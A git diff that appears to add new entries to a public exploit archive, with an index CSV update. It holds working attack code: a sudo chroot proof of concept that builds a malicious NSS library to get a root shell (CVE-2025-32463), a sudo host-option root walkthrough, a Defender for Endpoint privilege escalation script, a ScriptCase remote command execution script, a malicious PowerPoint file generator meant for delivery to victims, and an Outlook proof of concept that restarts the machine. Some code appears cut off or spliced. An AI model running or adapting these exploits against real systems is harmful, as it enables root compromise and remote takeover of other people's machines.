diff --git a/exploits/linux/local/52352.txt b/exploits/linux/local/52352.txt new file mode 100644 index 000000000..6e4f7aaa9 --- /dev/null +++ b/exploits/linux/local/52352.txt @@ -0,0 +1,98 @@ +Exploit Title: Sudo chroot 1.9.17 - Local Privilege Escalation +Google Dork: not aplicable +Date: Mon, 30 Jun 2025 +Exploit Author: Stratascale +Vendor Homepage:https://salsa.debian.org/sudo-team/sudo +Software Link: +Version: Sudo versions 1.9.14 to 1.9.17 inclusive +Tested on: Kali Rolling 2025-7-3 +CVE : CVE-2025-32463 + +*Version running today in Kali:* +https://pkg.kali.org/news/640802/sudo-1916p2-2-imported-into-kali-rolling/ + +*Background* + +An attacker can leverage sudo's -R (--chroot) option to run +arbitrary commands as root, even if they are not listed in the +sudoers file. + +Sudo versions affected: + + Sudo versions 1.9.14 to 1.9.17 inclusive are affected. + +CVE ID: + + This vulnerability has been assigned CVE-2025-32463 in the + Common Vulnerabilities and Exposures database. + +Details: + + Sudo's -R (--chroot) option is intended to allow the user to + run a command with a user-selected root directory if the sudoers + file allows it. A change was made in sudo 1.9.14 to resolve + paths via chroot() using the user-specified root directory while + the sudoers file was still being evaluated. It is possible for + an attacker to trick sudo into loading an arbitrary shared + library by creating an /etc/nsswitch.conf file under the + user-specified root directory. + + The change from sudo 1.9.14 has been reverted in sudo 1.9.17p1 + and the chroot feature has been marked as deprecated. It will + be removed entirely in a future sudo release. Because of the + way sudo resolves commands, supporting a user-specified chroot + directory is error-prone and this feature does not appear to + be widely used. + + A more detailed description of the bug and its effects can be + found in the Stratascale advisory: + https://www.stratascale.com/vulnerability-alert-CVE-2025-32463-sudo-chroot + +Impact: + + On systems that support /etc/nsswitch.conf a user may be able + to run arbitrary commands as root. + +*Exploit:* + +*Verify the sudo version running: sudo --versionIf is vulnerable, copy and +paste the following code and run it.* +*----------------------* +#!/bin/bash +# sudo-chwoot.sh – PoC CVE-2025-32463 +set -e + +STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX) +cd "$STAGE" + +# 1. NSS library +cat > woot1337.c <<'EOF' +#include +#include + +__attribute__((constructor)) +void woot(void) { + setreuid(0,0); /* change to UID 0 */ + setregid(0,0); /* change to GID 0 */ + chdir("/"); /* exit from chroot */ + execl("/bin/bash","/bin/bash",NULL); /* root shell */ +} +EOF + +# 2. Mini chroot with toxic nsswitch.conf +mkdir -p woot/etc libnss_ +echo "passwd: /woot1337" > woot/etc/nsswitch.conf +cp /etc/group woot/etc # make getgrnam() not fail + +# 3. compile libnss_ +gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c + +echo "[*] Running exploit…" +sudo -R woot woot # (-R ) + # • the first “woot” is chroot + # • the second “woot” is and inexistent +command + # (only needs resolve the user) + +rm -rf "$STAGE" +*----------------------* \ No newline at end of file diff --git a/exploits/linux/local/52354.txt b/exploits/linux/local/52354.txt new file mode 100644 index 000000000..95530a4f4 --- /dev/null +++ b/exploits/linux/local/52354.txt @@ -0,0 +1,60 @@ +# Exploit Title: Sudo 1.9.17 Host Option - Elevation of Privilege +# Date: 2025-06-30 +# Exploit Author: Rich Mirch +# Vendor Homepage: https://www.sudo.ws +# Software Link: https://www.sudo.ws/dist/sudo-1.9.17.tar.gz +# Version: Stable 1.9.0 - 1.9.17, Legacy 1.8.8 - 1.8.32 +# Fixed in: 1.9.17p1 +# Vendor Advisory: https://www.sudo.ws/security/advisories/host_any +# Blog: +https://www.stratascale.com/vulnerability-alert-CVE-2025-32462-sudo-host +# Tested on: Ubuntu 24.04.1; Sudo 1.9.15p5, macOS Sequoia 15.3.2; Sudo +1.9.13p2 +# CVE : CVE-2025-32462 +# +No exploit is required. Executing a sudo or sudoedit command with the host +option referencing an unrelated remote host rule causes Sudo to treat the +rule as valid for the local system. As a result, any command allowed by the +remote host rule can be executed on the local machine. + +Example /etc/sudoers file using the Host_Alias directive. The lowpriv user +is allowed to execute all commands (full root) on dev.test.local, +ci.test.local, but not prod.test.local. + +Host_Alias SERVERS = prod.test.local, dev.test.local +Host_Alias PROD = prod.test.local +lowpriv SERVERS, !PROD = NOPASSWD:ALL +lowpriv ci.test.local = NOPASSWD:ALL + +Even though the prod.test.local server is explicitly denied for the lowpriv +user, root access is achieved by specifying the host option for the +dev.test.local or ci.test.local servers. + +Example + +Show that lowpriv is not allowed to execute sudo on the prod server. + +lowpriv@prod:~$ id +uid=1001(lowpriv) gid=1001(lowpriv) groups=1001(lowpriv) +lowpriv@prod:~$ sudo -l +[sudo] password for lowpriv: +Sorry, user lowpriv may not run sudo on prod. + +List the host rules for the dev.test.local server. + +lowpriv@prod:~$ sudo -l -h dev.test.local +Matching Defaults entries for lowpriv on dev: + env_reset, mail_badpass, +secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, +use_pty + +User lowpriv may run the following commands on dev: + (root) NOPASSWD: ALL + +Execute a root shell on prod.test.local by specifying the -h dev.test.local +option. + +lowpriv@prod:~$ sudo -h dev.test.local -i +sudo: a remote host may only be specified when listing privileges. +root@prod:~# id +uid=0(root) gid=0(root) groups=0(root) \ No newline at end of file diff --git a/exploits/multiple/local/52355.txt b/exploits/multiple/local/52355.txt new file mode 100644 index 000000000..b2fc7fbf3 --- /dev/null +++ b/exploits/multiple/local/52355.txt @@ -0,0 +1,78 @@ +#!/bin/bash +# Exploit Title: Microsoft Defender for Endpoint (MDE) - Elevation of Privilege +# Date: 2025-05-27 +# Exploit Author: Rich Mirch +# Vendor Homepage: https://learn.microsoft.com/en-us/defender-endpoint/ +# Software Link: +https://learn.microsoft.com/en-us/defender-endpoint/microsoft-defender-endpoint-linux +# Versions: +# Vulnerable March-2025 Build: 101.25012.0000 30.125012.0000.0 +# Vulnerable Feb-2025 Build: 101.24122.0008 20.124112.0008.0 +# Vulnerable Feb-2025 Build: 101.24112.0003 30.124112.0003.0 +# Vulnerable Jan-2025 Build: 101.24112.0001 30.124112.0001.0 +# Vulnerable Jan-2025 Build: 101.24102.0000 30.124102.0000.0 +# +# Vendor Advisory: +https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47161 +# Blog: http://stratascale.com/vulnerability-alert-cve202547161 +# Tested on: Ubuntu 24.04.1 LTS and 24.04.2 LTS +# CVE : CVE-2025-47161 +# +echo "MDE Version: $(mdatp version)" + +# stage +cat >mde-exp.c< +#include +#include +#include + +void woot(){ + // for manual testing + if(isatty(STDERR_FILENO)) { + fprintf(stderr,"Woot!\n"); + } + system("ps -ef > /woot.txt"); + sleep(3000000); +} + +EOF + +# build exploit +gcc -fPIC -o woot.o -Wall -c mde-exp.c +gcc -Wall -shared -Wl,-soname,woot.so -Wl,-init,woot -o /tmp/woot.so woot.o + +mkdir -p /tmp/build/osquery/build/installed_formulas/openssl/etc/openssl/ + +cat > /tmp/build/osquery/build/installed_formulas/openssl/etc/openssl/openssl.cnf +< http://10.58.8.213/scriptcase/devel/iface/login.php +# Production Environment login page => http://10.58.8.213/scriptcase/prod/lib/php/devel/iface/login.php +def detect_deployment_path(homepage_url): + res = requests.get(homepage_url, verify=False) # HTTP redirections are handled automatically (not JS redirects) + if res.status_code == 200: + print("[+] Looking for deployment path in JS and computing login paths") + reg = r"var sc_pathToTB = '(.+)/prod/third/jquery_plugin/thickbox/';" + match = re.search(reg, res.text) + # compute URL without path + parsed_url = urllib.parse.urlparse(homepage_url) + homepage_root = f"{parsed_url.scheme}://{parsed_url.netloc}" + if match: + base_path = match.group(1) + print(f"[+] Deployment path found: {base_path}/") + print(f"[+] ScriptCase login page: {homepage_root}{base_path}/devel/iface/login.php (probably not deployed on a production environment)") + print(f"[+] Production Environment login page: {homepage_root}{base_path}/prod/lib/php/devel/iface/login.php") + else: # either a website not made with ScriptCase or root redirects to the devel page + js_redirect(res) + # try to detect the devel/iface/login.php page + reg2 = r'http://www\.scriptcase\.net|doChangeLanguage|str_lang_user_first' + match = re.search(reg2, res.text) + if match: # devel page + print(f"[?] This may be the development console?") + # now try to extract path from favicon + reg3 = r' + + + + + + + + + + + + + + + + {trigger_text} + + + + + + +''' + + try: + with zipfile.ZipFile(filename, 'w') as z: + z.writestr('[Content_Types].xml', + ''' + + + + +''') + + z.writestr('ppt/_rels/presentation.xml.rels', + ''' + + +''') + + z.writestr('ppt/presentation.xml', + ''' + + + + + +''') + + z.writestr('ppt/slides/slide1.xml', slide_xml) + + print(f"[+] Malicious PPTX file '{filename}' created successfully.") + print("[*] Deliver this file to the victim and wait for them to open it in vulnerable PowerPoint.") + except Exception as e: + print(f"[-] Error: {e}", file=sys.stderr) + sys.exit(1) + +def main(): + parser = argparse.ArgumentParser(description='Exploit generator for CVE-2025-47175 (PowerPoint UAF)') + parser.add_argument('-o', '--output', type=str, default='exploit_cve_2025_47175.pptx', + help='Output PPTX filename (default: exploit_cve_2025_47175.pptx)') + parser.add_argument('-i', '--id', type=int, default=1234, + help='Shape ID (default: 1234)') + parser.add_argument('-n', '--name', type=str, default='MaliciousShape', + help='Shape Name (default: MaliciousShape)') + parser.add_argument('-t', '--text', type=str, default='This content triggers CVE-2025-47175 UAF vulnerability.', + help='Trigger text inside the slide (default: explanation message)') + args = parser.parse_args() + + create_exploit_pptx(args.output, args.id, args.name, args.text) + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/windows/remote/52356.txt b/exploits/windows/remote/52356.txt new file mode 100644 index 000000000..0fc92f9b6 --- /dev/null +++ b/exploits/windows/remote/52356.txt @@ -0,0 +1,341 @@ +# Titles: Microsoft Outlook - Remote Code Execution (RCE) +# Author: nu11secur1ty +# Date: 07/06/2025 +# Vendor: Microsoft +# Software: https://www.microsoft.com/en-us/microsoft-365/outlook/log-in +# Reference: +https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47176 > +https://www.cloudflare.com/learning/security/what-is-remote-code-execution/ +# CVE-2025-47176 + +## Description +This proof-of-concept (PoC) demonstrates the CVE-2025-47176 vulnerability +simulation. It injects a crafted mail item into Outlook containing a +malicious sync path that triggers an action during scanning. + +**IMPORTANT:** +This PoC simulates the vulnerable Outlook path parsing and triggers a +**system restart** when the malicious path is detected. + +--- +## Additional Testing with malicious.prf + +You can also test this PoC by importing a crafted Outlook Profile File +(`malicious.prf`): + +1. Place `malicious.prf` in the same folder as `PoC.py`. +2. Run Outlook with the import command: + + ```powershell + & "C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE" +/importprf malicious.prf + + +## Usage + +1. Ensure you have Outlook installed and configured on your Windows machine. +2. Run the PoC script with Python 3.x (requires `pywin32` package): + ```powershell + pip install pywin32 + python PoC.py + ``` +3. The script will: + - Inject a mail item with the malicious sync path. + - Wait 10 seconds for Outlook to process the mail. + - Scan Inbox and Drafts folders. + - Upon detection, normalize the path and trigger a system restart +(`shutdown /r /t 5`). + +--- + +## Warning + +- This script **will restart your computer** after 5 seconds once the +payload is triggered. +- Save all work before running. +- Test only in a controlled or virtualized environment. +- Do **NOT** run on production or important systems. + +--- + +## Files + +- `PoC.py` - The Python proof-of-concept script. +- `README.md` - This file. + +--- + +## License + +This PoC is provided for educational and research purposes only. + +Use responsibly and ethically. + + +# Video: +[href](https://www.youtube.com/watch?v=nac3kUe_d1c) + +# Source: +[href]( +https://github.com/nu11secur1ty/CVE-mitre/tree/main/2025/CVE-2025-47176) + +# Buy me a coffee if you are not ashamed: +[href](https://www.paypal.com/donate/?hosted_button_id=ZPQZT5XMC5RFY) + +# Time spent: +03:35:00 + + +-- +System Administrator - Infrastructure Engineer +Penetration Testing Engineer +Exploit developer at https://packetstormsecurity.com/ +https://cve.mitre.org/index.html +https://cxsecurity.com/ and https://www.exploit-db.com/ +0day Exploit DataBase https://0day.today/ +home page: https://www.nu11secur1ty.com/ +hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= + nu11secur1ty + + +На нд, 6.07.2025 г. в 10:34 nu11 secur1ty +написа: + +> # Titles: Microsoft Outlook Remote Code Execution Vulnerability - ACE +> # Author: nu11secur1ty +> # Date: 07/06/2025 +> # Vendor: Microsoft +> # Software: https://www.microsoft.com/en-us/microsoft-365/outlook/log-in +> # Reference: +> https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47176 > +> https://www.cloudflare.com/learning/security/what-is-remote-code-execution/ +> # CVE-2025-47176 +> +> ## Description +> This proof-of-concept (PoC) demonstrates the CVE-2025-47176 vulnerability +> simulation. It injects a crafted mail item into Outlook containing a +> malicious sync path that triggers an action during scanning. +> +> **IMPORTANT:** +> This PoC simulates the vulnerable Outlook path parsing and triggers a +> **system restart** when the malicious path is detected. +> +> --- +> ## Additional Testing with malicious.prf +> +> You can also test this PoC by importing a crafted Outlook Profile File +> (`malicious.prf`): +> +> 1. Place `malicious.prf` in the same folder as `PoC.py`. +> 2. Run Outlook with the import command: +> +> ```powershell +> & "C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE" +> /importprf malicious.prf +> +> +> ## Usage +> +> 1. Ensure you have Outlook installed and configured on your Windows +> machine. +> 2. Run the PoC script with Python 3.x (requires `pywin32` package): +> ```powershell +> pip install pywin32 +> python PoC.py +> ``` +> 3. The script will: +> - Inject a mail item with the malicious sync path. +> - Wait 10 seconds for Outlook to process the mail. +> - Scan Inbox and Drafts folders. +> - Upon detection, normalize the path and trigger a system restart +> (`shutdown /r /t 5`). +> +> --- +> +> ## Warning +> +> - This script **will restart your computer** after 5 seconds once the +> payload is triggered. +> - Save all work before running. +> - Test only in a controlled or virtualized environment. +> - Do **NOT** run on production or important systems. +> +> --- +> +> ## Files +> +> - `PoC.py` - The Python proof-of-concept script. +> - `README.md` - This file. +> +> --- +> +> ## License +> +> This PoC is provided for educational and research purposes only. +> +> Use responsibly and ethically. +> +> +> # Reproduce: +> [href](https://www.youtube.com/watch?v=yOra0pm8CHg) +> +> # Source: +> [href]( +> https://github.com/nu11secur1ty/CVE-mitre/tree/main/2025/CVE-2025-47176) +> +> # Buy me a coffee if you are not ashamed: +> [href](https://www.paypal.com/donate/?hosted_button_id=ZPQZT5XMC5RFY) +> +> # Time spent: +> 03:35:00 +> +> +> -- +> System Administrator - Infrastructure Engineer +> Penetration Testing Engineer +> Exploit developer at https://packetstormsecurity.com/ +> https://cve.mitre.org/index.html +> https://cxsecurity.com/ and https://www.exploit-db.com/ +> 0day Exploit DataBase https://0day.today/ +> home page: https://www.nu11secur1ty.com/ +> hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= +> nu11secur1ty +> +> На нд, 6.07.2025 г. в 9:53 nu11 secur1ty +> написа: +> +>> # Titles: Microsoft Outlook Remote Code Execution Vulnerability - ACE +>> # Author: nu11secur1ty +>> # Date: 07/06/2025 +>> # Vendor: Microsoft +>> # Software: https://www.microsoft.com/en-us/microsoft-365/outlook/log-in +>> # Reference: +>> https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47176 > +>> https://www.cloudflare.com/learning/security/what-is-remote-code-execution/ +>> # CVE-2025-47176 +>> +>> ## Description +>> This proof-of-concept (PoC) demonstrates the CVE-2025-47176 vulnerability +>> simulation. It injects a crafted mail item into Outlook containing a +>> malicious sync path that triggers an action during scanning. +>> +>> **IMPORTANT:** +>> This PoC simulates the vulnerable Outlook path parsing and triggers a +>> **system restart** when the malicious path is detected. +>> +>> --- +>> ## Additional Testing with malicious.prf +>> +>> You can also test this PoC by importing a crafted Outlook Profile File +>> (`malicious.prf`): +>> +>> 1. Place `malicious.prf` in the same folder as `PoC.py`. +>> 2. Run Outlook with the import command: +>> +>> ```powershell +>> & "C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE" +>> /importprf malicious.prf +>> +>> +>> ## Usage +>> +>> 1. Ensure you have Outlook installed and configured on your Windows +>> machine. +>> 2. Run the PoC script with Python 3.x (requires `pywin32` package): +>> ```powershell +>> pip install pywin32 +>> python PoC.py +>> ``` +>> 3. The script will: +>> - Inject a mail item with the malicious sync path. +>> - Wait 10 seconds for Outlook to process the mail. +>> - Scan Inbox and Drafts folders. +>> - Upon detection, normalize the path and trigger a system restart +>> (`shutdown /r /t 5`). +>> +>> --- +>> +>> ## Warning +>> +>> - This script **will restart your computer** after 5 seconds once the +>> payload is triggered. +>> - Save all work before running. +>> - Test only in a controlled or virtualized environment. +>> - Do **NOT** run on production or important systems. +>> +>> --- +>> +>> ## Files +>> +>> - `PoC.py` - The Python proof-of-concept script. +>> - `README.md` - This file. +>> +>> --- +>> +>> ## License +>> +>> This PoC is provided for educational and research purposes only. +>> +>> Use responsibly and ethically. +>> +>> +>> # Reproduce: +>> [href](https://www.youtube.com/watch?v=yOra0pm8CHg) +>> +>> # Buy me a coffee if you are not ashamed: +>> [href](https://www.paypal.com/donate/?hosted_button_id=ZPQZT5XMC5RFY) +>> +>> # Time spent: +>> 03:35:00 +>> +>> +>> -- +>> System Administrator - Infrastructure Engineer +>> Penetration Testing Engineer +>> Exploit developer at https://packetstormsecurity.com/ +>> https://cve.mitre.org/index.html +>> https://cxsecurity.com/ and https://www.exploit-db.com/ +>> 0day Exploit DataBase https://0day.today/ +>> home page: https://www.nu11secur1ty.com/ +>> hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= +>> nu11secur1ty +>> +>> -- +>> +>> System Administrator - Infrastructure Engineer +>> Penetration Testing Engineer +>> Exploit developer at https://packetstorm.news/ +>> https://cve.mitre.org/index.html +>> https://cxsecurity.com/ and https://www.exploit-db.com/ +>> 0day Exploit DataBase https://0day.today/ +>> home page: https://www.nu11secur1ty.com/ +>> hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= +>> nu11secur1ty +>> +> +> +> -- +> +> System Administrator - Infrastructure Engineer +> Penetration Testing Engineer +> Exploit developer at https://packetstorm.news/ +> https://cve.mitre.org/index.html +> https://cxsecurity.com/ and https://www.exploit-db.com/ +> 0day Exploit DataBase https://0day.today/ +> home page: https://www.nu11secur1ty.com/ +> hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= +> nu11secur1ty +> + + +-- + +System Administrator - Infrastructure Engineer +Penetration Testing Engineer +Exploit developer at https://packetstorm.news/ +https://cve.mitre.org/index.html +https://cxsecurity.com/ and https://www.exploit-db.com/ +0day Exploit DataBase https://0day.today/ +home page: https://www.nu11secur1ty.com/ +hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= + nu11secur1ty \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 1cc6a1f9c..1a7a6906d 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -7803,6 +7803,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 42183,exploits/linux/local/42183.c,"Sudo 1.8.20 - 'get_process_ttyname()' Local Privilege Escalation",2017-06-14,"Qualys Corporation",local,linux,,2017-06-15,2017-06-20,0,CVE-2017-1000367,,Linux_sudo_CVE-2017-1000367.c,,,http://seclists.org/oss-sec/2017/q2/470 48052,exploits/linux/local/48052.sh,"Sudo 1.8.25p - 'pwfeedback' Buffer Overflow",2020-02-06,"Dylan Katz",local,linux,,2020-02-11,2020-08-20,0,CVE-2019-18634,,,,,https://github.com/Plazmaz/CVE-2019-18634/blob/b348e738a83fd4180b3ec26ed216535547f3bb8a/self-contained.sh 47502,exploits/linux/local/47502.py,"sudo 1.8.27 - Security Bypass",2019-10-15,"Mohin Paramasivam",local,linux,,2019-10-15,2021-12-17,0,CVE-2019-14287,,,,, +52354,exploits/linux/local/52354.txt,"Sudo 1.9.17 Host Option - Elevation of Privilege",2025-07-08,"Rich Mirch",local,linux,,2025-07-08,2025-07-08,0,CVE-2025-32462,,,,, +52352,exploits/linux/local/52352.txt,"Sudo chroot 1.9.17 - Local Privilege Escalation",2025-07-08,Stratascale,local,linux,,2025-07-08,2025-07-08,0,CVE-2025-32463,,,,, 26498,exploits/linux/local/26498.txt,"Sudo Perl 1.6.x - Environment Variable Handling Security Bypass",2005-11-11,"Charles Morris",local,linux,,2005-11-11,2013-07-01,1,CVE-2005-4158;OSVDB-20764,,,,,https://www.securityfocus.com/bid/15394/info 319,exploits/linux/local/319.c,"sudo.bin - NLSPATH Privilege Escalation",1996-02-13,_Phantom_,local,linux,,1996-02-12,,1,OSVDB-61460,,,,, 470,exploits/linux/local/470.c,"SudoEdit 1.6.8 - Local Change Permission",2004-09-21,"Angelo Rosiello",local,linux,,2004-09-20,2016-03-30,1,OSVDB-10023;CVE-2004-1689,,,,http://www.exploit-db.comsudo-1.6.8.tar.gz, @@ -10492,6 +10494,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 44006,exploits/multiple/local/44006.html,"Marked2 - Local File Disclosure",2018-02-06,"Corben Leo",local,multiple,,2018-02-08,2018-02-08,0,,,,,,http://www.lynxsecurity.io/releases/Local%20File%20Disclosure%20in%20Marked2.pdf 19796,exploits/multiple/local/19796.c,"Matt Kimball and Roger Wolff mtr 0.28/0.41 / Turbolinux 3.5 b2/4.2/4.4/6.0 - mtr (2)",2000-03-03,"Babcia Padlina",local,multiple,,2000-03-03,2012-07-13,1,CVE-2000-0172;OSVDB-5268,,,,,https://www.securityfocus.com/bid/1038/info 49491,exploits/multiple/local/49491.py,"Metasploit Framework 6.0.11 - msfvenom APK template command injection",2021-01-28,"Justin Steven",local,multiple,,2021-01-28,2021-01-28,0,CVE-2020-7384,,,,, +52355,exploits/multiple/local/52355.txt,"Microsoft Defender for Endpoint (MDE) - Elevation of Privilege",2025-07-08,"Rich Mirch",local,multiple,,2025-07-08,2025-07-08,0,CVE-2025-47161,,,,, 51359,exploits/multiple/local/51359.txt,"Microsoft Edge (Chromium-based) Webview2 1.0.1661.34 - Spoofing",2023-04-10,nu11secur1ty,local,multiple,,2023-04-10,2023-04-10,0,CVE-2023-24892,,,,, 51571,exploits/multiple/local/51571.txt,"Microsoft Edge 114.0.1823.67 (64-bit) - Information Disclosure",2023-07-06,nu11secur1ty,local,multiple,,2023-07-06,2023-07-19,0,CVE-2023-33145,,,,, 48231,exploits/multiple/local/48231.md,"Microsoft VSCode Python Extension - Code Execution",2020-03-17,Doyensec,local,multiple,,2020-03-18,2020-03-18,0,,,,,,https://github.com/doyensec/VSCode_PoC_Oct2019/tree/19f09e5cf4bfcad500f9238748fb34d07284fa4f @@ -11522,6 +11525,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 15298,exploits/multiple/remote/15298.txt,"Sawmill Enterprise < 8.1.7.3 - Multiple Vulnerabilities",2010-10-21,"SEC Consult",remote,multiple,,2010-10-21,2015-04-21,0,OSVDB-68821;OSVDB-68820;OSVDB-68819;OSVDB-68818,,,,, 24246,exploits/multiple/remote/24246.txt,"SCI Photo Chat 3.4.9 - Cross-Site Scripting",2004-07-20,"Donato Ferrante",remote,multiple,,2004-07-20,2013-01-20,1,CVE-2004-0673;OSVDB-7473,,,,,https://www.securityfocus.com/bid/10648/info 46193,exploits/multiple/remote/46193.py,"SCP Client - Multiple Vulnerabilities (SSHtranger Things)",2019-01-18,"Mark E. Haase",remote,multiple,,2019-01-18,2019-01-18,0,CVE-2019-6111;CVE-2019-6110,,"SSHtranger Things",,,https://gist.github.com/mehaase/63e45c17bdbbd59e8e68d02ec58f4ca2 +52353,exploits/multiple/remote/52353.py,"ScriptCase 9.12.006 (23) - Remote Command Execution (RCE)",2025-07-08,"Alexandre ZANNI",remote,multiple,,2025-07-08,2025-07-08,0,CVE-2025-47228,,,,, 4761,exploits/multiple/remote/4761.pl,"Sendmail with clamav-milter < 0.91.2 - Remote Command Execution",2007-12-21,eliteboy,remote,multiple,25,2007-12-20,2016-12-04,1,CVE-2007-4560,,,,, 34439,exploits/multiple/remote/34439.txt,"ServletExec - Directory Traversal / Authentication Bypass",2010-08-12,"Stefano Di Paola",remote,multiple,,2010-08-12,2014-08-28,1,,,,,,https://www.securityfocus.com/bid/42411/info 23756,exploits/multiple/remote/23756.txt,"Seyeon Technology FlexWATCH Server 2.2 - Cross-Site Scripting",2004-02-24,"Rafel Ivgi The-Insider",remote,multiple,,2004-02-24,2012-12-30,1,,,,,,https://www.securityfocus.com/bid/9739/info @@ -11922,6 +11926,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 31686,exploits/multiple/webapps/31686.py,"Dexter (CasinoLoader) Panel - SQL Injection",2014-02-16,bwall,webapps,multiple,80,2014-02-16,2014-02-16,1,OSVDB-103387,,,,, 45007,exploits/multiple/webapps/45007.txt,"Dicoogle PACS 2.5.0 - Directory Traversal",2018-07-11,"Carlos Avila",webapps,multiple,,2018-07-11,2018-07-13,1,,Traversal,,http://www.exploit-db.com/screenshots/idlt45500/45007.png,, 33759,exploits/multiple/webapps/33759.txt,"DirectAdmin 1.33.6 - 'CMD_DB_VIEW' Cross-Site Scripting",2010-03-14,r0t,webapps,multiple,,2010-03-14,2014-06-15,1,,,,,,https://www.securityfocus.com/bid/38721/info +52358,exploits/multiple/webapps/52358.py,"Discourse 3.2.x - Anonymous Cache Poisoning",2025-07-08,İbrahimsql,webapps,multiple,,2025-07-08,2025-07-08,0,CVE-2024-47773,,,,, 49752,exploits/multiple/webapps/49752.html,"DMA Radius Manager 4.4.0 - Cross-Site Request Forgery (CSRF)",2021-04-08,"Issac Briones",webapps,multiple,,2021-04-08,2021-04-08,0,CVE-2021-30147,,,,, 48681,exploits/multiple/webapps/48681.txt,"Docsify.js 4.11.4 - Reflective Cross-Site Scripting",2020-07-22,"Amin Sharifi",webapps,multiple,,2020-07-22,2020-07-22,0,CVE-2020-7680,,,,, 33764,exploits/multiple/webapps/33764.txt,"Dojo Toolkit 1.4.1 - '/dijit/tests/_testCommon.js?theme' Cross-Site Scripting",2010-03-15,"Adam Bixby",webapps,multiple,,2010-03-15,2017-11-24,1,CVE-2010-2275;OSVDB-63073,,,,,https://www.securityfocus.com/bid/38739/info @@ -12430,6 +12435,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 51218,exploits/multiple/webapps/51218.txt,"SQL Monitor 12.1.31.893 - Cross-Site Scripting (XSS)",2023-04-03,geeklinuxman,webapps,multiple,,2023-04-03,2023-04-03,0,CVE-2022-47870,,,,, 17174,exploits/multiple/webapps/17174.txt,"SQL-Ledger 2.8.33 - (Authenticated) Local File Inclusion / Edit",2011-04-15,bitform,webapps,multiple,,2011-04-15,2011-04-15,1,,,,,http://www.exploit-db.comsql-ledger-2.8.33.tar.gz, 24320,exploits/multiple/webapps/24320.py,"SQLiteManager 1.2.4 - Remote PHP Code Injection",2013-01-24,RealGame,webapps,multiple,,2013-01-24,2018-03-15,1,OSVDB-89701,,,,http://www.exploit-db.comSQliteManager-1.2.4.tar.gz, +52357,exploits/multiple/webapps/52357.txt,"Stacks Mobile App Builder 5.2.3 - Authentication Bypass via Account Takeover",2025-07-08,stealthcopter,webapps,multiple,,2025-07-08,2025-07-08,0,CVE-2024-50477,,,,, 50237,exploits/multiple/webapps/50237.py,"Strapi 3.0.0-beta - Set Password (Unauthenticated)",2021-08-30,"David Anglada",webapps,multiple,,2021-08-30,2021-08-30,0,CVE-2019-18818,,,,, 50238,exploits/multiple/webapps/50238.py,"Strapi 3.0.0-beta.17.7 - Remote Code Execution (RCE) (Authenticated)",2021-08-30,"David Utón",webapps,multiple,,2021-08-30,2021-08-30,0,CVE-2019-19609,,,,, 50239,exploits/multiple/webapps/50239.py,"Strapi CMS 3.0.0-beta.17.4 - Remote Code Execution (RCE) (Unauthenticated)",2021-08-30,"Musyoka Ian",webapps,multiple,,2021-08-30,2021-08-30,0,,,,,, @@ -44532,6 +44538,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 32339,exploits/windows/remote/32339.txt,"Microsoft Organization Chart 2 - Remote Code Execution",2008-09-08,"Ivan Sanchez",remote,windows,,2008-09-08,2014-03-19,1,CVE-2008-3956;OSVDB-48000,,,,,https://www.securityfocus.com/bid/31059/info 16700,exploits/windows/remote/16700.rb,"Microsoft Outlook - 'ATTACH_BY_REF_ONLY' File Execution (MS10-045) (Metasploit)",2010-09-20,Metasploit,remote,windows,,2010-09-20,2011-03-10,1,CVE-2010-0266;OSVDB-66296;MS10-045,"Metasploit Framework (MSF)",,,,http://www.akitasecurity.nl/advisory.php?id=AK20091001 16699,exploits/windows/remote/16699.rb,"Microsoft Outlook - 'ATTACH_BY_REF_RESOLVE' File Execution (MS10-045) (Metasploit)",2010-09-20,Metasploit,remote,windows,,2010-09-20,2011-03-10,1,CVE-2010-0266;OSVDB-66296;MS10-045,"Metasploit Framework (MSF)",,,,http://www.akitasecurity.nl/advisory.php?id=AK20091001 +52356,exploits/windows/remote/52356.txt,"Microsoft Outlook - Remote Code Execution (RCE)",2025-07-08,nu11secur1ty,remote,windows,,2025-07-08,2025-07-08,0,,,,,, 20571,exploits/windows/remote/20571.txt,"Microsoft Outlook 2000 0/98 0/Express 5.5 - Concealed Attachment",2001-01-17,http-equiv,remote,windows,,2001-01-17,2012-08-27,1,OSVDB-85833,,,,,https://www.securityfocus.com/bid/2260/info 23796,exploits/windows/remote/23796.html,"Microsoft Outlook 2002 - 'Mailto' Quoting Zone Bypass",2004-03-09,shaun2k2,remote,windows,,2004-03-09,2013-01-01,1,CVE-2004-0121;OSVDB-4168,,,,,https://www.securityfocus.com/bid/9827/info 24114,exploits/windows/remote/24114.html,"Microsoft Outlook 2003 - Mail Client E-mail Address Verification",2004-05-11,http-equiv,remote,windows,,2004-05-11,2013-01-15,1,CVE-2004-0501;OSVDB-6079,,,,,https://www.securityfocus.com/bid/10323/info @@ -44565,6 +44572,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 28226,exploits/windows/remote/28226.c,"Microsoft PowerPoint 2003 - '.ppt' File 